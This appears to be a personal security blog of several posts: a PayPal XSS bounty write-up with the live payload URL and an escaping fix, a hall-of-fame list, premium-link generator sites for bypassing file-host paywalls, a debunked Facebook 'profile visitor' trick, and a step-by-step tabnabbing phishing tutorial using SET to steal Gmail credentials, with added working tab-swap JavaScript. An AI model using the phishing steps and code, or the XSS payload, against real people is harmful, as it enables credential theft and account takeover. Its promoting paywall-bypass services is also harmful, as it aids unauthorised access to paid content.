Friday, April 17, 2015

XSS Bug on Paypal.com

Hello Leets,

Today I am writing about my finding on Paypal.com.

It's an XSS (Cross Site Scripting).

The story began on the 31st of December 2014, when everyone was enjoying the New Year celebrations and I was busy hunting for security bugs.

Then I started hunting on a PayPal site.

After lots of tries I found a pattern that let me inject my code and trigger the XSS.


So the vulnerable parameter is:
q=

Vulnerable link:
===========


https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E
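As an added example (not part of the original post, and not PayPal's code; the page does not show where q was reflected): the payload begins with `">`, the classic break-out from a quoted HTML attribute, so the snippet below assumes q landed inside a `value=""` attribute. It shows that rendering beside a hardened version that applies HTML attribute encoding, and parses the reported URL with Node's WHATWG `URL` class to show that it is the last of the three q parameters that carries the payload.

```javascript
'use strict';

// The reported URL, copied from the post. It repeats q three times; the URL
// parser keeps all of them and percent-decodes the values for us.
const REPORTED_URL = 'https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E';

// The same payload, URL-decoded.
const PAYLOAD = '"><img src=x onerror=prompt(document.domain)>';

// Return every q value in order (last one is the payload).
function extractQValues(url) {
  return new URL(url).searchParams.getAll('q');
}

// Assumed vulnerable sink: q is concatenated straight into a quoted attribute.
// The leading " closes value="...", the > closes the <input> tag, and the rest
// of the value becomes a brand-new <img> element with an onerror handler.
function renderSearchBoxVulnerable(q) {
  return '<input type="text" name="q" value="' + q + '">';
}

// Hardened version: encode the five HTML metacharacters so nothing inside the
// value can terminate the attribute or open a tag.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSearchBoxFixed(q) {
  return '<input type="text" name="q" value="' + escapeHtmlAttr(q) + '">';
}

// Triage check for a captured response body: true when the payload is echoed
// with its metacharacters intact (i.e. it would be parsed as markup).
function reflectsUnencoded(html, payload) {
  return html.includes(payload);
}

// Stand-alone demo.
const qs = extractQValues(REPORTED_URL);
console.log('q values:', qs);
console.log('vulnerable:', renderSearchBoxVulnerable(qs[qs.length - 1]));
console.log('fixed:     ', renderSearchBoxFixed(qs[qs.length - 1]));
```

The hardened output keeps the entire payload inside the quotes as inert text; the check function is the one-liner you run over a proxy capture before spending time on a manual verification.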


Poc:
=====



Video Demo:
==========





The bug is fixed now, and PayPal paid me a bounty of $750.

Thanks, PayPal team.

Saturday, June 14, 2014

Listed and Acknowledged as a White Hat Hacker


Hall Of Fame in SONY

https://secure.sony.net/hallofthanks




Hall Of Fame in ORACLE

http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/2368792.xml




Hall Of Fame in APPLE INC

https://support.apple.com/en-us/HT201536




Hall of Fame & Wall of Fame, Top 10 Security Researchers
+ Bounty

https://www.paypal.com/webapps/mpp/security-tools/wall-of-fame-honorable-mention

https://www.paypal.com/us/webapps/mpp/security-tools/wall-of-fame






Acknowledged by ESET




Hall Of Fame In Informatica

https://hackerone.com/informatica/thanks




Hall Of Fame In 123contactform.com

http://www.123contactform.com/security-acknowledgements.htm



Hall Of Fame In Lookout

https://hackerone.com/lookout/thanks




Hall Of Fame In INTUIT
https://security.intuit.com/acknowledgements.html



Hall of Fame In BlackBerry Inc.

http://us.blackberry.com/enterprise/products/incident-response-team.html



Acknowledged with a Digital Certificate by Mediafire




Hall Of Fame In MadWhips

http://www.madwhips.com/credits



Hall Of Fame In C2FO

https://hackerone.com/c2fo/thanks



Hall Of Fame In HowAboutWe

https://hackerone.com/howaboutwe/thanks






Hall Of Fame In Compose.io

https://www.compose.io/security/




Reward: Swag from PagerDuty for finding a bug in their
website.





Hall Of Fame In Siteground

https://www.siteground.com/term/92.htm





Hall Of Fame In Unitag.io

https://www.unitag.io/security



Hall Of Fame In ENVATO

http://webuild.envato.com/helpful-hacker




Digital Certificates from the
U.S. Department of Homeland Security






Hall Of Fame In Twitter

https://hackerone.com/twitter/thanks




Hall Of Fame In Appcelerator

http://www.appcelerator.com/privacy/responsible-disclosure-of-security-vulnerabilities/





Hall Of Fame In ExpressionEngine

https://hackerone.com/expressionengine/thanks





Hall Of Fame In ADOBE

helpx.adobe.com/security/acknowledgements.html



Digital Certificate From : LAVASOFT




Hall Of Fame In BarracudaLabs

https://barracudalabs.com/research-resources/bug-bounty-program/bug-bounty-hall-of-fame-2/




Hall Of Fame In JSDELIVR

https://hackerone.com/jsdelivr/thanks





Hall Of Fame In MAGIX AG

http://research.magix.com/




Hall Of Fame In Bitcasa

https://support.bitcasa.com/hc/en-us/articles/202210658-How-To-Responsibly-Report-Security-Concerns





Hall of Fame In AT&T Bug Bounty

https://bugbounty.att.com/hof.php




Hall Of Fame In Wepay.com

https://hackerone.com/wepay/thanks




Hall Of Fame In Factlink.com 

https://hackerone.com/factlink/thanks



Hall Of Fame In Hotgloo Security Response 

http://www.hotgloo.com/security/security-response





Badge of Honor Digital Certificate from: Moment.me


Tuesday, October 1, 2013

Premium Link Generator Websites List


1. Generator Link Premium:



Generator Link Premium is my favorite generator website. It allows you to download files of any size from Extabit and most other file hosts for free. You can even use IDM to download your Extabit files. There is also no limit on file size or on the number of files. Try this one first, and if you have problems with it, try the next one!



2. Unrestrict:




Unrestrict.li is another website in this category. It provides the same benefits as the first one, but it requires you to register for an account in order to get the premium benefits, so I have put it in second place.


3. Tigerleech:





Tigerleech provides premium links for Extabit files. This website also requires you to register for an account in order to get premium links. For free users, the speed is limited to 120 KB/s, though that speed is adequate for most users. Hence, Tigerleech occupies the 3rd spot in the list.


4. Rapid8:



Rapid8 is one of the oldest websites providing premium links. When it comes to Extabit, Rapid8 allows free users to generate premium links for files below 500 MB in size. If your file is smaller than 500 MB, use Rapid8 to download Extabit files with ease.


I hope you can now use one of the above Extabit premium link generator websites to get Extabit premium benefits. Most of these links work for other file storage websites too. Hence, you don't have to wait for downloads or purchase a premium account; simply use these links and they will do the job for you. Cheers!

Sunday, September 22, 2013

How To Find Your Facebook Profile Visitors

Here is a trick that is said to show who recently visited your profile. Follow the steps below to see the IDs it is based on; a caveat follows at the end.

Step 1) Go to your Facebook profile page.

Step 2) Press Ctrl + U to view the source code of your profile page.

Step 3) Press Ctrl + F to open the search box.

Step 4) Search for this string: {"list":

Step 5) You will find a list of Facebook profile IDs, as shown in the example image below (click the image to zoom).

Step 6) According to this trick, these are the profile IDs of the friends who visited your profile recently.

Step 7) The IDs at the start of the list are supposed to be the ones who visited the most often.

Step 8) To find out who an ID belongs to, open a new tab and enter the link below:

graph.facebook.com/<Facebook Profile Id>

For example: www.facebook.com/100005817068623

Caveat: Facebook does not expose who viewed your profile, and the {"list": array in the page source is the ranked list of your own friends that the page embeds to populate the chat sidebar. Every ID in it is therefore one of your friends, whether or not they ever opened your profile, and the order reflects Facebook's own ranking of your interactions with them, not a visitor log.
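An added example, not part of the original post and not Facebook's code: a small parser that does steps 4 to 8 automatically on a saved copy of the page source. The sample source below is constructed for the example; its shape (a `{"list":[...]}` object whose entries are a numeric profile ID followed by a dash and a short suffix) is an assumption drawn from the post, and the IDs other than the one the post itself uses are made up. As noted above, the IDs this returns are your friends in Facebook's ranking order, not profile visitors.

```javascript
'use strict';

// Constructed sample of a page-source fragment containing the {"list":[...]}
// object the post tells you to search for. Not real Facebook markup.
const SAMPLE_SOURCE =
  '<script>/* ... */ [],{"list":["100005817068623-2","100000000000001-0",' +
  '"100000000000002-2"],"shortProfiles":{}} /* ... */</script>';

// Locate the {"list":[...]} object and return the numeric profile IDs in the
// order the page lists them. Returns [] when the fragment is absent or the
// array does not parse, so a changed page layout fails closed.
function extractProfileIds(pageSource) {
  const m = pageSource.match(/\{"list":(\[[^\]]*\])/);
  if (!m) return [];
  let entries;
  try {
    entries = JSON.parse(m[1]);
  } catch (e) {
    return [];
  }
  return entries
    .filter((e) => typeof e === 'string')
    .map((e) => e.split('-')[0])        // drop the "-2" / "-0" style suffix (assumed format)
    .filter((id) => /^\d+$/.test(id));  // keep only well-formed numeric IDs
}

// Step 8 for the first n IDs: both the profile URL and the Graph API URL the
// post mentions.
function profileUrls(ids, n = 10) {
  return ids.slice(0, n).map((id) => ({
    id,
    profile: 'https://www.facebook.com/' + id,
    graph: 'https://graph.facebook.com/' + id,
  }));
}

// Stand-alone demo on the constructed sample.
console.log(profileUrls(extractProfileIds(SAMPLE_SOURCE)));
```

Run it against a file saved from Ctrl + U (`fs.readFileSync('profile.html', 'utf8')` in place of `SAMPLE_SOURCE`); the regex is deliberately narrow so that any other `"list"` key with nested arrays is ignored rather than mis-parsed.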


Friday, September 13, 2013

How to Hack Gmail, Facebook with Using Tab Nabbing


This is a phishing technique known as tabnabbing.

Attacker OS: Kali Linux

Victim's OS: Windows



Start the Social-Engineer Toolkit (SET).



Select the option => Social-Engineering Attacks


Select option 2 => Website Attack Vectors


Select option 4 => Tabnabbing Attack Method


Select option 2 => Site Cloner


Type your IP address and the site you want to clone.
My IP is 192.168.152.132,

and I will clone Gmail for this attack.


Now the listener has started. Send your IP address to the victim via chat or any other channel; you can also use a URL shortener to hide the link.


When the victim opens the link, they see a page that appears to be still loading, so they switch to another tab, and that is when the attack kicks in: the script turns the now-background tab into your phishing page. When the victim comes back to that tab and logs in, the credentials are posted to your listener.


And now you have the victim's username and password.

Check: the cloned page is served from your raw IP over plain HTTP, so a victim who looks at the address bar sees neither the real Gmail domain nor a TLS padlock. That is the tell a target should be trained to look for.
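An added example, not part of the original post and not the Social-Engineer Toolkit's own page script: a minimal model of what "the script turned the new tab into your phishing page" means in the browser. The `makeFakeBrowser` stand-in is constructed so the logic runs under Node; in a real attack page the same listener is attached to the real `document` and the swap goes through the real `location`. The clone path `/gmail-clone` and the title are assumptions; SET serves its clone wherever it is configured to.

```javascript
'use strict';

// Constructed stand-in for the slice of the DOM the attack page uses: a
// document with a visibility flag and event listeners, plus a location.
function makeFakeBrowser(startUrl) {
  const listeners = {};
  const document = {
    hidden: false,
    title: 'Please wait while the page loads...',
    addEventListener(type, fn) {
      (listeners[type] = listeners[type] || []).push(fn);
    },
    // A real browser fires events itself; the simulation does it by hand.
    dispatch(type) {
      (listeners[type] || []).forEach((fn) => fn());
    },
  };
  const location = {
    href: startUrl,
    replace(url) { location.href = url; },
  };
  return { document, location };
}

// The attacker's page script. In the foreground the page only shows a
// "loading" message. When the tab is backgrounded (document.hidden becomes
// true and visibilitychange fires) it retitles itself to match the cloned
// site and replaces its own location with the clone, so the tab the victim
// returns to is the fake login page. location.replace() adds no history
// entry, so pressing Back does not reveal the loading page.
function armTabnab(browser, cloneUrl, fakeTitle) {
  const state = { swapped: false };
  browser.document.addEventListener('visibilitychange', () => {
    if (state.swapped || !browser.document.hidden) return; // act once, and only when hidden
    state.swapped = true;
    browser.document.title = fakeTitle;
    browser.location.replace(cloneUrl);
  });
  return state;
}

// The scenario from the post: victim opens the attacker's IP, sees it
// "loading", switches tabs, then comes back.
function runScenario() {
  const browser = makeFakeBrowser('http://192.168.152.132/');
  const state = armTabnab(browser, 'http://192.168.152.132/gmail-clone', 'Gmail');
  const trace = [];

  browser.document.dispatch('visibilitychange'); // fired while still visible: no swap
  trace.push(browser.location.href);

  browser.document.hidden = true;                // victim switches to another tab
  browser.document.dispatch('visibilitychange');
  trace.push(browser.location.href);

  browser.document.hidden = false;               // victim comes back
  browser.document.dispatch('visibilitychange');
  trace.push(browser.location.href);

  return { trace, title: browser.document.title, swapped: state.swapped };
}

console.log(runScenario());
```

The guard on `document.hidden` is what keeps the loading page from swapping while the victim is still looking at it; the `swapped` flag keeps a second visibility change from re-issuing the navigation.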